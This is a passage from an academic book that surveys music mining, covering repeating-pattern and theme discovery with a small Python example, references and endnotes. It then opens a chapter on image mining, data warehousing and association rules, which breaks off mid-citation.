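Using the definition quoted above (a repeating pattern is a subsequence of consecutive elements appearing at least twice), the brute-force sketch below finds a longest repeating pattern in a note sequence by scanning candidate lengths from the longest downwards. It is a baseline for illustration only; the correlative-matrix, string-join and length-ascending algorithms cited above are far more efficient.

```python
def longest_repeating_pattern(notes):
    """Return a longest contiguous subsequence occurring at least twice
    in `notes` (occurrences may overlap), or [] if none exists."""
    n = len(notes)
    for length in range(n - 1, 0, -1):          # longest candidates first
        seen = set()
        for start in range(n - length + 1):
            pattern = tuple(notes[start:start + length])
            if pattern in seen:
                return list(pattern)            # second occurrence found
            seen.add(pattern)
    return []

# MIDI pitches of a toy melody whose opening motif returns near the end.
melody = [60, 62, 64, 65, 67, 60, 62, 64, 65, 72]
print(longest_repeating_pattern(melody))        # [60, 62, 64, 65]
```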
Algorithms for Music Theme Discovery

Having argued in the previous section for the efficiency and semantic quality of repeating patterns as far as content-based music data retrieval is concerned, their use in indexing music sequences for the purposes of MIR (Hsu et al., 2001) comes as no surprise. Most importantly though, they provide a reference point for the discovery of music themes (Liu, Hsu, & Chen, 1999; Smith & Medina, 2001). Themes, being the musical phrases most likely to be remembered by listeners, allow a theme index to focus the search on the parts of the database most apt to match a query. Although a theme should be identifiable by the methods of the previous section, the difficulty that arises is how to distinguish the theme among all the repeating patterns discovered. To address this issue, a number of theme-discovery algorithms have been proposed; these are subsequently presented.
Thus, as far as the use of repeating patterns in theme discovery is concerned, Smith and Medina (2001) proposed a pattern matching technique leading to theme discovery that is based on a collection of previously found longest repeating patterns. Meek and Birmingham (2001) identify numerous features that need to be extracted from each music object for the discovery of themes. Among them, they considered most important the position of the theme (favouring themes appearing earlier in the music object). As described, such features can be used for the discovery of themes from the repeating patterns found. In addition, an interesting web-based system for theme discovery is presented in Kornstadt (1998). In polyphonic music, patterns may not only lie within one voice but may also be distributed across several simultaneously sounding voices. Iliopoulos and Kurokawa (2002) and Iliopoulos, Niyad, Lemstrom, and Pinzon (2002) present a number of different algorithms for the discovery of such patterns, including distributed pattern matching with at most k differences (motif evolution).
SUMMARY AND PERSPECTIVES We have presented the most significant trends in recent research in the field of music mining. Similarity searching has attracted a lot of attention because it is related to CBMIR, the most prominent application of music mining. Due to peculiarities of music data, we paid special attention to issues regarding the perception of music. Next, we examined how well-known functionalities like clustering, classification and detection of repeating patterns have been applied in music mining. As described, music mining presents unique challenges; thus, the developed methods are quite dissimilar to existing ones from other mining fields. The prospects of music mining, both in terms of research and applications, seem to be
encouraging. Since it is a relatively new research field, it contains several open research issues. To name some important ones: methods for detecting meaningful music units, scalable algorithms (which will also consider disk-resident music data) and tools for visualisation and audition (which are not required in other mining fields) of the extracted patterns. Music mining can and should expand to new application areas as well. To name a few:
(a) Tracing of plagiarism and copyright protection, by using clever similarity searching that will disclose hidden reproduction of original music.
(b) E-commerce of music. Attempts like iTune or iMusic may change the paradigm of how music is merchandised. We can envisage environments in which users can interactively search for individual music pieces and create their own compilations. For this task, a user can be assisted by music mining, which will help in finding the desired pieces as well as other pieces, which may be previously unknown to the user and different in terms of genre and style.
(c) The relation with industrial standards. MPEG-7 is an example of an emerging standard, which tries to define a description of audio-based musical content. This can have an impact on the hardware industry as well, since manufacturers of recording devices (video cameras and DVD recorders) may want to include the functionality of automatic indexing of recorded music content (Leman, 2002).
For all the above reasons, we believe that music mining will grow significantly in the forthcoming years.
REFERENCES
Abiteboul, S. (1997). Querying semi-structured data. In Proceedings of Conference on Database Theory (pp. 1-18).
AKoff. (2001). AKoff sound labs, AKoff Music Composer. Retrieved from http://www.akoff. com/ Amir, A., & Farach, M. (1995). Efficient 2-dimensional approximate matching of half-rectangular figures. Information and Computation, 118, 1-11. AMNS. (2000). Nightingale. Retrieved from http://www.ngale.com Arakisoftware. (2003). Arakisoftware AmazingMIDI. Retrievable from http://www.pluto.dti. ne.jp/ ~araki/amazingmidi/ Bainbridge, D. (1998). MELDEX: A web-based melodic index service. In Melodic similarity: concepts, procedures, and applications, Computing in Musicology, 11, ch. 12, 223-230. Bello, J. P. (2003). Towards the automated analysis of simple polyphonic music: A knowledge-based approach. Unpublished doctoral dissertation, Univ. of London. Bent, I. (1980). Analysis. Grove’s Dictionary of Music. London: Macmillan. Bigand, E., Madurell, F., Tillmann, B., & Pineau, M. (1999). Effect of global structure and temporal organization on chord processing. Journal of Experimental Psychology: Human Perception and Performance, 25, 184-197. Byrd, D., & Crawford, T. (2002). Problems of music information retrieval in the real world. Information Processing and Management, 38(2), 249-272. Byrd, D. (2001). Music-notation searching and digital libraries. In Proceedings of ACM/ IEEE - CS Joint Conference on Digital Libraries (pp. 239-246). Cambouropoulos, E., & Widmer, G. (2000). Automatic motivic analysis via melodic clustering. Journal of New Music Research, 29(4), 303-317.
Cambouropoulos, E., Crochemore, M., Iliopoulos, C. S., Mouchard, L., & Pinzon Y. J. (1999). Algorithms for computing approximate repetitions in musical sequences. In Proceedings of Australasian Workshop on Combinatorial Algorithms (Vol. 3, pp. 114-128). Chai, W., & Vercoe, B. (2003). Structural analysis of musical signals for indexing and thumbnailing. In Proceedings of ACM/IEEE-CS Joint Conference on Digital Libraries (pp. 27-34). Chen, J. C. C., & Chen, A. L. P. (1998). Query by rhythm: An approach for song retrieval in music databases. In Proceedings of Workshop Research Issues in Data Engineering (pp. 139-146). Cilibrasi, R., de Wolf, R., & Vitanyi, P. (2003). Algorithmic clustering of music. The Computing Research Repository. Clifford, R., & Iliopoulos, C. S. (2004). Approximate string matching for music analysis. Soft Computing. Cooper, M., & Foote, J. (2003). Summarizing popular music via structural similarity Analysis. In Proceedings of IEEE Workshop on Applications of Signal Processing to Audio and Acoustics. Crawford, T., Iliopoulos, C. S., & Raman, R. (1998). String matching techniques for musical similarity and melodic recognition. Computing in Musicology, 11, 73-100. Davy, M., & Godsill, S. (2003). Bayesian harmonic models for musical signal analysis. Valencia International meeting (Bayesian Statistics 7), Oxford University Press. Dervos, D., Linardis, P., & Manolopoulos, Y. (1997). S-index: A hybrid structure for text retrieval. In Proceedings of East-European Conference on Advances in Databases and Information Systems (pp. 204-209). Deshpande, H., Singh, R., & Nam, U. (2001). Classification of music signals in the visual domain.
In Proceedings of the COST-G6 Conference on Digital Audio Effects. Doraisamy, S., & Ruger, S. (2004). A polyphonic music retrieval system using N-Gram. In Proceedings of International Symposium in Music Information Retrieval. Eerola, T., Järvinen, T., Louhivuori, J., & Toiviainen, P. (2001). Statistical features and perceived similarity of folk melodies. Music Perception, 18, 275-296. Fayyad, U. M., Piatetsky-Shapiro, G., & Smyth, P. (1996). The KDD process for extracting useful knowledge from volumes of data. Communications of the ACM, 39(11), 27-34. Hoos, H. H., Hamel, K. A., Renz, K., & Kilian, J. (1998). The GUIDO music notation format - A novel approach for adequately representing score-level music. In Proceedings of International Computer Music Conference (pp. 451-454). Hoos, H. H., Renz, K., & Gorg, M. (2001). GUIDO/MIR: An experimental musical information retrieval system based on GUIDO music notation. In Proceedings of International Symposium on Music Information Retrieval (pp. 41-50). Hsu, J., Liu, C., & Chen, A. L. P. (1998). Efficient repeating pattern finding in music databases. In Proceedings of International Conference on Information and Knowledge Management (pp. 281-288). Hsu, J., Liu, C., & Chen, A. L. P. (2001). Discovering non-trivial repeating patterns in music data. IEEE Transactions on Multimedia, 3(3), 311-325. Hubbard, T. L. (1996). Synesthesia-like mappings of lightness, pitch, and melodic interval. American Journal of Psychology, 109, 219-238. Iliopoulos, C. S., & Kurokawa, M. (2002). Exact & approximate distributed matching for musical melodic recognition. In Proceedings of Conven-
tion on Artificial Intelligence and the Simulation of Behaviour (pp. 49-56). Iliopoulos, C. S., Lemstrom, K., Niyad, M., & Pinzon, Y. J. (2002). Evolution of musical motifs in polyphonic passages. In Proceedings of Symposium on AI and Creativity in Arts and Science (pp. 67-76). Iliopoulos, C. S., Niyad, M., Lenstrom, K., & Pinzon, Y. J. (2002). Evolution of musical motifs in polyphonic passages. In Proceedings of Convention on Artificial Intelligence and the Simulation of Behaviour (pp. 67-75). Innovative (2004). Innovative music systems intelliScore. Retrievable from http://www.intelliscore.net/ ISO/IEC. (2003). MPEG-7 overview (version 9). Retrievable from http://www.chiariglione.org/ mpeg/standards/ mpeg-7/mpeg-7.htm Kalogeraki, V., Gunopulos, D., & ZeinalipourYazti, D. (2002). A local search mechanism for peer-to-peer networks. In Proceedings of Conference on Information and Knowledge Management (pp. 300-307). Karydis, I., Nanopoulos, A., & Manolopoulos, Y. (2005). Mining maximum-length repeating patterns in music databases. Multimedia Tools & Applications. Manuscript submitted for publication. Karydis, I., Nanopoulos, A., Papadopoulos, A., & Manolopoulos, Y. (2005). Audio indexing for efficient music information retrieval. In Proceedings of International Multimedia Modelling Conference (pp. 22-29). Karydis, I., Nanopoulos, A., Papadopoulos, A., & Manolopoulos, Y. (2005). Evaluation of similarity searching methods for music data in peer-to-peer networks. International Journal of Business Intelligence and Data Mining. Manuscript submitted for publication.
Lin, K., Jagadish, H., & Faloutsos, C. (1994). The TV-Tree: An index structure for high-dimensional data. The VLDB Journal, 3(4), 517-542. Klapuri, A. (2004). Signal processing methods for the automatic transcription of music. Unpublished doctoral dissertation. Tampere University of Technology, Finland. Koh, J. L., & Yu, W. D. C. (2001). Efficient feature mining in music objects. In Proceedings of Database and Expert Systems Applications (pp. 221-231). Kornstadt, A. (1998). Themefinder: A web-based melodic search tool. Computing in Musicology, 11, 231-236. Kostek, B., & Wieczorkowska, A. (1997). Parametric representation of musical sounds. Archive of Acoustics, 3-26. Lambropoulos, A. S., & Tsihrintzis, G. A. (2004). Agglomerative hierarchical clustering for musical database visualization and browsing. In Proceedings of Hellenic Conference on Artificial Intelligence (pp. 177-186). Lamont, A., & Dibben, N. (2001). Motivic structure and the perception of similarity. Music Perception, 18, 245-274. Lee, W., & Chen, A. L. P. (2000). Efficient multifeature index structures for music information retrieval. In Proceedings of Annual International Symposium Electronic Imaging 2000 Science & Technology (pp. 177-188). Leman, M. (2002). Musical audio mining. Dealing with the data flood: Mining data, text and multimedia. Rotterdam: STT Netherlands Study Centre for Technology Trends. Li, M., Badger, J. H., Chen, X., Kwong, S., Kearney, P., & Zhang, H. (2001). An information-based sequence distance and its application to whole mitochondrial genome phylogeny. Bioinformatics, 17(2), 149-154.
Li, M., Chen, X., Li, X., Ma, B. & Vitanyi, P. (2003). The similarity metric. In Proceedings of ACM-SIAM Symposium on Discrete Algorithms (pp. 863-872). Li, M., & Vitanyi, P. M. B. (2002). Algorithmic complexity. International Encyclopedia of the Social & Behavioural Sciences (pp. 376-382). Li, S. Z. (2000). Content-based classification and retrieval of audio using the nearest feature line method. IEEE Transactions on Speech and Audio Processing, 8(5), 619-625. Li, T., Ogihara, M, & Li, Q. (2003). A comparative study on content-based music genre classification. In Proceedings of Conference on Research and Development in Information Retrieval (pp. 282-289). Li, X., & Wu, J. (2004). Searching techniques in peer-to-peer networks. In Handbook of theoretical and algorithmic aspects of ad hoc, sensor, and peer-to-peer networks. Boca Raton, Florida: CRC Press. Lippincott, A. (2002). Issues in content-based music information retrieval. Journal of Information Science, 137-142. Liu, C. C., Hsu, J. L., & Chen, A. L. P. (1999). An approximate string matching algorithm for content-based music data retrieval. In Proceedings of IEEE Multimedia Computing and Systems (pp. 451-456). Liu, C. C., Hsu, J. L., & Chen, A. L. P. (1999). Efficient theme and non-trivial repeating pattern discovering in music databases. In Proceedings of IEEE International Conference on Data Engineering (pp. 14-21). Liu, N.-H., Wu, Y.-H., & Chen, A. L. P. (2003). Efficient K-NN search in polyphonic music databases using a lower bounding mechanism. In Proceedings of International Workshop on Multimedia Information Retrieval (pp. 163-170).
Lo, Y. L., & Chen, S. J. (2003). The multi-featured indexing for music data. Journal of Chaoyang University of Technology, 1, 355-374. Maidín, D. Ó. (1998). A geometrical difference algorithm. Computing in Musicology, 11, 65-72. Maidín, D. Ó, & Cahill, M. (2001). Score processing for MIR. In Proceedings of International Symposium on Music Information Retrieval. McAdams, S., Vieillard, S., Houix, O., & Reynolds, R. (2004). Perception of musical similarity among contemporary thematic materials in two instrumentations. Music Perception, 22, 207237. Meek, C., & Birmingham, W. P. (2001). Thematic extractor. In Proceedings of International Symposium on Music Information Retrieval (pp. 119-128). Meredith, D. (2003). Musical grouping structure. Lectures on Music Perception and Cognition, Part II Module BMus/BSc in Music Department of Music, City University, London. Mitra, S., Pal, S., & Mitra, P. (2004). Data mining is soft computing framework: A survey. IEEE Transactions on Neural Networks, 13(1), 3-14. Owen, S.R. (2000). On the similarity of MIDI documents. Harvard University. Papaodysseus, C., Roussopoulos, G., Fragoulis, D., Panagopoulos, Th., & Alexiou, C. (2001). A new approach to the automatic recognition of musical recordings. Journal of Acoustical Engineering Society, 49(1/2), 23-35. Paraskevas, M., & Mourjopoulos, J. (1996). A statistical study of the variability and features of audio signals. Audio Engineering Society. Pfeiffer, S., Fischer, S., & Effelsberg, W. (1996). Automatic audio content analysis. In Proceedings of ACM International Conference on Multimedia (pp. 21-30).
Pickens, J. (2001). A survey of feature selection techniques for music information retrieval. Technical report, Center for Intelligent Information Retrieval, Department of Computer Science, University of Massachussetts. Pickens, J. (2004). Harmonic modeling for polyphonic music retrieval. Unpublished doctoral dissertation. University of Massachusetts at Amherst. Pickens, J., Bello, J. P., Monti, G., Crawford, T., Dovey, M., Sandler, M., & Byrd, D. (2003). Polyphonic score retrieval using polyphonic audio queries: A harmonic modeling approach. Journal of New Music Research, 32(2), 223-236. Pienimäki, A., & Lemström, K. (2004). Clustering symbolic music using paradigmatic and surface level analyses. In Proceedings of International Conference on Music Information Retrieval (pp. 262-265). Pikrakis, A., Theodoridis, S., & Kamarotos, D. (2002). Recognition of isolated musical patterns using hidden markov models. In Proceedings of International Conference on Music and Artificial Intelligence (pp. 133-143). Pickens, J. (2001). A survey of feature selection techniques for music information retrieval. In Proceedings of International Symposium on Music Information Retrieval. Reiss, J., Aucouturier, J.-J., & Sandler, M. (2001). Efficient multidimensional searching routines for music information retrieval. In Proceedings of International Conference on Music Information Retrieval (pp. 163-171). Roads, C. (1996). The computer music tutorial. MIT Press. Rolland, P.-R., & Ganascia, J.-G. (2002). Pattern detection and discovery: The case of music data mining. In Proceedings of ESF Exploratory Workshop on Pattern Detection and Discovery (pp. 190-198).
Schellenburg, E. G., Krysciak, A. M., & Campbell, R. J. (2001). Perceiving emotion in melody: Interactive effects of pitch and rhythm. Music Perception, 18, 155-171. Seventh (2004). Seventh String Software, Transcribe! Retrievable from http://www.seventhstring. demon.co.uk/ Shepard, R. (1999). Music, cognition, and computerized sound: An introduction to psychoacoustics. Cambridge, MA: MIT Press. Shifrin, J., Pardo, B., Meek, C., & Birmingham, W. (2002). HMM-based musical query retrieval. In Proceedings of ACM/IEEE-CS Conference on Digital libraries (pp. 295-300). Smith, L., & Medina, R. (2001). Discovering themes by exact pattern patching. In Proceedings of International Symposium on Music Information Retrieval (pp. 31-32). Soltau, H., Schultz, T., & Westphal, M. (1998). Recognition of music types. In Proceedings of the IEEE International Conference on Acoustics, Speech and Signal Processing. Subrahmanian, V. S. (1998). Multimedia database systems. San Francisco: Morgan Kaufmann Publishers. Szeto, W. M., & Wong, M. H. (2003). A stream segregation algorithm for polyphonic music databases. In Proceedings of International Database Engineering and Applications Symposium (pp. 130-138). Temperley, D. (2001). The cognition of basic musical structures. MIT Press. Tzanetakis, G., Essl, G., & Cook, P. (2001). Automatic musical genre classification of audio signals. In Proceedings of International Symposium on Music Information Retrieval. Velivelli, A., Zhai, C., & Huang, T. S. (2003). Audio segment retrieval using a synthesized HMM. In Proceedings of ACM SIGIR Workshop on Multimedia Information Retrieval.
White, R. E. (2004). Recognition and perception of whole-tone, natural minor, harmonic minor, and melodic minor scales. In Proceedings of Southwestern Psychological Association.
Wieczorkowska, A. (2001). Musical sound classification based on wavelet analysis. Fundamenta Informaticae, 47(1/2), 175-188.
Wieczorkowska, A., & Ras, Z. (2001). Audio content description in sound databases. Web Intelligence: Research and Development (pp. 175-183).
Wold, E., Blum, T., Keislar, D., & Wheaton, J. (1996). Content-based classification, search and retrieval of audio. IEEE Trans. Multimedia, 3(3), 27-36.
Won, J.-Y., Lee, J.-H., Ku, K., Park, J., & Kim, Y.-S. (2004). A content-based music retrieval system using representative melody index from music databases. In Proceedings of East-European Conference on Advances in Databases and Information Systems.
Yang, B., & Garcia-Molina, H. (2002). Improving search in peer-to-peer networks. In Proceedings of International Conference of Distributed Computer Systems, 5-15.
Yang, C. (2002). Efficient acoustic index for music retrieval with various degrees of similarity. In Proceedings of ACM Multimedia Conference, 584-591.

ENDNOTES
1. Rolland and Ganascia (2002) make an interesting distinction between pattern discovery and pattern extraction. The former refers to the detection of local regularities in data. The latter also refers to such kind of detection, but is additionally concerned with the explicit availability of the patterns in some language, at the end of the mining process.
2. To name just a few: music sold as CDs, concerts, broadcasting of video-clips in mass media, advertised products related to music and music performers and, more recently, online sales of music in electronic format.
3. Notice that when mining from relational or other highly structured data, this problem is not present at all, since units of information are well defined by the schema of the database.
4. See: “The Complete Detailed MIDI 1.0 Specification,” MIDI Manufacturers Association, 1996.
5. This list is by no means exhaustive. It merely presents a few of the latest systems.
6. For a broader analysis readers are referred to Roads (1996).
7. For a broader analysis readers are referred to Roads (1996).
8. Acoustical pertains to the objective physics of a sound. For example, frequency is a physical or acoustical property, whereas pitch is a subjective or auditory property.
9. Music information exchanged in P2P networks is customarily in acoustic format.
This work was previously published in Processing and Managing Complex Data for Decision Support Systems, edited by J. Darmont and O. Boussaid, pp. 340-374, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 1.5
Pattern Mining and Clustering on Image Databases Marinette Bouet LIMOS, Blaise Pascal University-Clermont-Ferrand, France Pierre Gançarski LSIIT-AFD-Louis Pasteur University, France Marie-Aude Aufaure Supélec—INRIA, France Omar Boussaïd University LUMIERE Lyon, France
ABSTRACT Analysing and mining image data to derive potentially useful information is a very challenging task. Image mining concerns the extraction of implicit knowledge, image data relationships, associations between image data and other data or patterns not explicitly stored in the images. Another crucial task is to organise the large image volumes to extract relevant information. In fact, decision support systems are evolving to store and analyse these complex data. This chapter presents a survey of the relevant research related to image data processing. We present data warehouse advances that organise large volumes of data linked
with images, and then we focus on two techniques largely used in image mining. We present clustering methods applied to image analysis, and we introduce the new research direction concerning pattern mining from large collections of images. While considerable advances have been made in image clustering, there is little research dealing with image frequent pattern mining. We will try to understand why.
INTRODUCTION In recent years, most organisations have been dealing with multimedia data integrating differ-
ent formats such as images, audio formats, video formats, texts, graphics, or XML documents. For example, a lot of image data have been produced for various professional or domestic domains such as weather forecasting, surveillance flights, satellites, bio-informatics, biomedical imaging, marketing, tourism, press, Web, and so forth. Such data have been at the disposal of all audiences. Faced with the amount of information produced in numerous domains, there has been a growing demand for tools allowing people to efficiently manage, organise, and retrieve multimedia data. In this chapter, we focus our attention on the media image. Images may be characterised in terms of three aspects—the volume of the data, the pixel matrix, and the high dimensionality of the data. The first aspect is linked to the huge volume of these data (from a few hundred bytes to several gigabytes for the remote sensing images); the second one reflects the intrinsic nature of the pixel matrix. A pixel or a pixel sequence itself does not mean anything: images do not directly contain any information. Yet the presence of one or more pixel sequences often points to the presence of relevant information. In fact, image interpretation and exploitation need extra relevant information including semantic concepts such as annotations or ontologies, cluster characterisation, and so forth. Today, image and, more generally, multimedia retrieval systems have reached their limits owing to this semantic information absence.
Moreover, in the image retrieval context, a logical indexation process is performed to associate a set of metadata (textual and visual features) with images. These image features are stored in numeric vectors. Their high dimensionality, the third image aspect, constitutes a well known problem. All these different points are, in fact, related to image complexity. Classical data mining techniques are largely used to analyse alphanumerical data. However, in an image context, databases are very large since
they contain strongly heterogeneous data, often not structured and possibly coming from different sources within different theoretical or applicative domains (pixel values, image descriptors, annotations, trainings, expert or interpreted knowledge, etc.). Besides, when objects are described by a large set of features, many of them are correlated, while others are noisy or irrelevant. Furthermore, analysing and mining these multimedia data to derive potentially useful information is not easy. For example, image mining involves the extraction of implicit knowledge, image data relationships, associations between image data, and other data or patterns not explicitly stored in the images. To circumvent this complexity, we can multiply the number of descriptors. The problem is now to define multidimensional indexes so that searching the nearest neighbours becomes more efficient using the index rather than a sequential search. In the image case, the high dimensionality due to complex descriptors is still an unsolved research problem. Moreover, another problem is to use external knowledge that could be represented using ontologies or metadata. Taking account of a priori knowledge, such as annotation and metadata to build an ontology dedicated to an application, is also a challenge and implies the definition of new descriptors that integrate semantics. As an example, the Web contains many images that are not exploited using the textual part of the Web pages. In this case, the combination of visual and textual information is particularly relevant. Finally, a crucial task is to organise these large volumes of “raw” data (image, text, etc.) in order to extract relevant information. In fact, decision support systems (DSS) such as data warehousing, data mining, or online analytical processing (OLAP) are evolving to store and analyse these complex data. OLAP and data mining can be seen as two complementary fields. OLAP can easily deal with structuring data before their analysis and with organising structured views. However, this technique is restricted to a simple data navigation
and exploration. Data warehouse techniques can help data preprocessing and offer a good structure for an efficient data mining process. Consequently, new tools must be developed to efficiently retrieve relevant information in specialised and generalised image databases. Different data mining techniques contributions have been or may be developed: reducing the retrieval space in the multidimensional indexation domain, learning by relevance feedback and without relevance feedback, and using the synergy between textual and visual features to better explore and exploit the image database. For instance, a usual way to address the problem of retrieval of relevant information is to perform an automatic classification of images, that is, to classify images into different categories so that each one is composed of images that have a similar content. A more recent approach consists in pattern mining such as rule mining: associations between image content features and non-image content features, associations of different image contents with no spatial relationships, and associations among image contents with spatial relationships. In this chapter, we present a survey of the relevant research related to image processing. We present data warehouse solutions to organise large volumes of data linked with images, and we focus on two techniques used in image mining. On one hand, we present clustering methods applied to image analysis, and on the other hand, we introduce the new research direction concerning pattern mining from large collections of images. Because there is a lack of hybrid data mining methods and methodologies which use the complementarity of these image or video data in a collaborative way, and which considers them from different points of view, we shall sketch a multistrategic data mining approach able to handle complex data. The rest of this chapter is organised as follows. The second section presents data warehouses, classification, and pattern mining techniques related to classical data. The third section pres-
ents some relevant work related to these three aspects applied to image mining. The fourth section describes some issues and applications linked with these approaches. The fifth section concludes our study.
DATA WAREHOUSE, PATTERN MINING, AND CLASSIFICATION IN CLASSICAL DATA PROCESSING This section presents data warehouses, classification, and pattern mining techniques related to classical data. Data warehouses techniques can be seen as a preprocessing stage used to strengthen data structuring. Data mining techniques, such as pattern mining (association rules or frequent pattern search), have been intensively used for many applications. This technique consists in generating rules from facts according to a threshold. Data clustering can be divided into partition, hierarchical, density-based, and conceptual clustering. Some methods are also based on neuronal methods such as self-organised maps. In most cases, the choice of a similarity measure is a crucial point.
Data Warehouses Data warehousing and OLAP technologies (Inmon, 2005; Kimball & Ross, 2002) are now considered well established. They aim, for instance, to analyse the behaviour of a customer, a product, or a company, and may help monitoring one or several activities (commercial or medical pursuits, patent deposits, etc.). In particular, they help analyse such activities in the form of numerical data. A data warehouse is a subject oriented, integrated, time-variant, and nonvolatile collection of data that supports managerial decision making (Inmon, 2005). Data warehousing has been cited as the highest-priority postmillennium project of more than half of information technology (IT) executives. A large number of data warehousing
methodologies and tools are available to support the growing market. However, with so many methodologies to choose from, a major concern for many firms is which one to employ in a given data warehousing project. Online transactional processing (OLTP) systems are useful for addressing the operational data needs of a firm. However, they are not well suited for supporting decision-support queries or business questions that managers typically need to answer. Such queries are analytical and can be answered using roll up aggregation, drill down, and slicing/dicing of data, which are best supported by OLAP systems. Data warehouses support OLAP applications by storing and maintaining data in multidimensional format (Chaudhuri & Dayal, 1997; Kimball & Ross, 2002). Data in an OLAP warehouse are extracted and loaded from multiple OLTP data sources (including DB2, Oracle, IMS databases, and flat files) using Extract, Transform, and Load (ETL) tools. The warehouse is located in a presentation server. It can span enterprise-wide data needs or can be a collection of “conforming” data marts. Data marts (subsets of data warehouses) are conformed by following a standard set of attribute declarations called a data warehouse bus (Kimball & Ross, 2002). The data warehouse uses a metadata repository to integrate all of its components. The metadata store the definitions of the source data, the data models for target databases, and the transformation rules that convert source data into target data. The concepts of time variance and nonvolatility are essential for a data warehouse (Inmon, 2005). Inmon emphasised the importance of cross-functional slices of data drawn from multiple sources to support a diversity of needs (Inmon, 2005); the foundation of his subject-oriented design was an enterprise data model. Kimball and Ross (2002) introduced the notion of dimensional modeling, which addresses the gap between relational databases and data warehouses. In classical data warehouses, data volumetry now constitutes the main problem. To tackle the
performance problem, several solutions, such as materialised views and index selection or fragmentation, are proposed in the literature. Star schemas are probably the simplest and most used data warehouse models. A star schema is characterised by one or more very large fact tables that contain the primary information in the data warehouse, and a number of much smaller dimension tables (or lookup tables), each of which contains information about the entries for a particular attribute in the fact table (Chaudhuri & Dayal, 1997; Kimball & Ross, 2002). In a warehousing process, multidimensional modeling allows the creation of appropriated analysis contexts. The data warehousing and OLAP technologies are now well-suited to be applied in management applications, especially when data are numerical. However, in many domain applications, such as medical or geographical ones, data coming from heterogeneous sources may be represented in different formats (text, images, video, etc.) and/or diversely structured. They may also be differently expressed and periodically changed. These data are called complex data. This complexity may concern the syntactic or the semantic aspect of data and, sometimes, it also concerns data processing. In this chapter, we have chosen to address the particular problem of image data, which represent a typical example of complex data. In the literature, there are a lot of image database applications which are OLTP-oriented databases; that is, their vocation is image data management and not image data analysis. However, a few image data warehouses exist. They are all closely linked to specific applications, such as medical applications (e.g., Wong, Hoo, Knowlton, Laxer, Cao, Hawkins, et al., 2002). The proposed architectures of image data warehouses may be applied only to a given field. They cannot be generalised to other fields. No general methodological approach suitable for image data warehouses has been defined. To do so, we extend the images with the complex data. Henceforth, we will consider the complex data in a general way.
Frequent Pattern Mining Frequent patterns resulting from mining are represented in a specific form called association rule. A typical example of association rule mining is market basket analysis. To analyse customer behaviour (i.e., to obtain information about customers and why they make purchases), Agrawal, Imielinski, and Swami (1993) introduced the association rule concept. Faced with the very huge amount of sales data, the authors developed an algorithm generating all significant rules between items in the database (i.e., an itemset is the set of items in transactions or rules). Such computed rules may be useful for taking decisions and are very easy to interpret. For example, placing products often purchased together at opposite ends of the store may entice customers buying such products to pick up other products along the way. Thus, the discovered association rules may allow stores to lay out products on the shelves more efficiently. An association rule example is “if a customer buys plants, then he also buys compost”. Since 1993, a lot of studies concerning extensions (the method may be applied in any domain where object clustering is judicious) and improvements (more efficient algorithms) of association rule mining problems have been proposed; more details may be found in surveys (Goethals, 2005). The association rule search in a database is probably the problem which most strongly contributed to the emergence of data mining. Today, association rule mining is one of the most popular problems when we look for interesting associations or correlations from a large data items set. More precisely, association rule mining is based on the following concepts. A transaction corresponds to a transaction identifier associated with a finite set of items called itemset. While a transaction database D is a finite multiset of transactions, an association rule is an implication of the form X ⇒ Y where the body or antecedent X and the head or consequent Y are itemsets having no item in common. Two measures of
rules interestingness are defined: rule support and rule confidence. The support of an association rule X ⇒ Y in D is the support of X ∪ Y in D where the support of an itemset X in D is the number of transactions in the cover of X in D and the cover of an itemset X in D corresponds to the transaction identifier set in D that supports X. The confidence of an association rule X ⇒ Y in D corresponds to the conditional probability of having Y contained in a transaction, given that X is already contained in this transaction. More intuitively, the rule support represents the usefulness of mined rules while the rule confidence corresponds to their certainty. In fact, an association rule is considered interesting if and only if it is both a frequent association rule (i.e., a rule whose support exceeds a given minimal support threshold) and a confident association rule (i.e., a rule whose confidence exceeds a given minimal confidence threshold). In the same way, a frequent itemset is an itemset whose support exceeds a given minimal support threshold. Thus given a transaction set, the general frequent pattern mining problem consists in generating all association rules whose support and confidence exceed the user or expert-specified minimum threshold values (rf. Agrawal et al., 1993, for further details on the problem description). In Han and Kamber (2001), association rules are classified into several categories according to different criteria. The authors distinguish association rules according to either the type of values they handle (such as Boolean values and quantitative values), the dimension of data implied in the rules (single/dimensional rules), the level of abstraction of the rules (single/multilevel association rules), or the various extensions to association mining (maximal frequent pattern, frequent closed itemsets). Methods for mining each one of these types of association rules is studied in Han and Kamber (2001, ch. 6). The problem of association rule mining from large databases is generally decomposed into two steps: the frequent itemset discovering process
and the frequent and confident association rule generating process from the previous discovered frequent itemsets. The frequent itemset discovering process is time-consuming as the search space has an exponential size in terms of the number of items occurring in the transaction database. The first algorithm called AIS (Agrawal et al., 1993) proposed to solve the frequent set mining problem was improved and gave rise to the wellknown Apriori algorithm published independently by Agrawal and Srikant (1994) and Mannila, Toivonen, and Verlamo (1994). The improvement is based on the set support monotonicity property that states “every subset of a frequent itemset is itself a frequent itemset”. The Apriori algorithm is based on an iterative approach known as level-wise search, where k-itemsets (i.e., an itemset containing k items) are used to explore (k+1)-itemsets. A lot of studies on association rule mining techniques in large databases have been proposed. These studies cover a broad active spectrum of topics concerning fast algorithms based on the level-wise Apriori search (Agrawal & Srikant, 1994; Klemettinen, Mannila, Ronkainen, Toivonen, & Verkamo, 1994) and its variations such as table hashing (Park, Chen, & Yu, 1995), transaction reduction (Agrawal & Srikant, 1994; Han & Fu, 1995; Park et al., 1995), partitioning (Savasere, Omiecinski, & Navathe, 1995), sampling (Toivonen, 1996) with incremental updating and parallel algorithms (Cheung, Han, Ng, & Wong, 1996; Han, Karypis, & Kumar, 1997; Park, Chen, & Yu, 1995a) while passing by mining of generalised and multilevel rules (Han & Fu, 1995; Srikant & Agrawal, 1995). We can also mention mining long patterns and dense data sets (Bayardo, 1998; Bayardo, Agrawal, & Gunopulos, 1999), mining correlations and causal structures (Brin, Motwani, & Silverstein, 1997; Silverstein, Brin, Motwani, & Ullman, 1998), mining ratio rules (Korn, Labrinidis, Kotidis, & Faloutsos, 1998), query-based constraint mining of associations (Ng, Lakshmanan, Han, & Pang, 1998; Srikant, Vu, & Agrawal, 1997), mining cyclic and
